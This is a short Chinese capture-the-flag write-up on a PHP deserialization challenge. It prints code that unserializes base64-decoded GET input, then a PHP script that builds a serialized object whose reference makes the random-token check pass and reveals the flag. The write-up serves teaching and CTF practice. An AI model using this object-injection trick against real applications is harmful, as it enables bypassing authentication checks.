[湖南科技学院2021]反序列化 – 作者:无名草talent

进入目标网址得代码：

代码分析：

<?php
final class User
{
private $userData;

public function __construct($loginAttempt)  //创建对象时调用  将值传给loginAttempt
{
$this->userData = unserialize($loginAttempt);  //调用反序列化
if (!$this->userData)
throw new InvalidArgumentException('Unable to reconstruct user data');
}

private function verifyUsername()
{
return $this->userData->username === 'husectfer';  //判断username
}

private function verifyRandomVal()
{
$this->userData->randomValue = random_int(1e10, 1e11 - 1);
return (int)$this->userData->rnd === $this->userData->randomValue;  
}  //构造 return放回结果为真

public function verify()
{
if (!$this->verifyUsername())   //调用verifyUsername() 判断
throw new InvalidArgumentException('Invalid username');

if (!$this->verifyRandomVal())//调用verifyRandomVal() 判断
throw new InvalidArgumentException('Invalid random token value');

return true;
}
}

if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);  //base64解码
$user = new User($var);   //创建一个新的user类
if ($user->verify()) {  //如果verify验证通过放出flag 要同时满足 v和v1函数
highlight_file("flag.php");
}
} else {
highlight_file("index.php");
}

代码审计要构造

username === husectfer rnd=randomValue

构造代码

<?php
$x = array();

$x['username'] = "husectfer";
$x['randomValue'] = random_int(1e10, 1e11 - 1);
$x['randomValue'] = 0;
$x['rnd'] = &$x['randomValue']; //将randomValue的地址赋给rnd使其达到相等目的

echo (serialize((object)$x)); //object 将其他类转换为对象
echo base64_encode(serialize((object)$x));
?>

来源：freebuf.com 2021-06-27 19:37:27 by: 无名草talent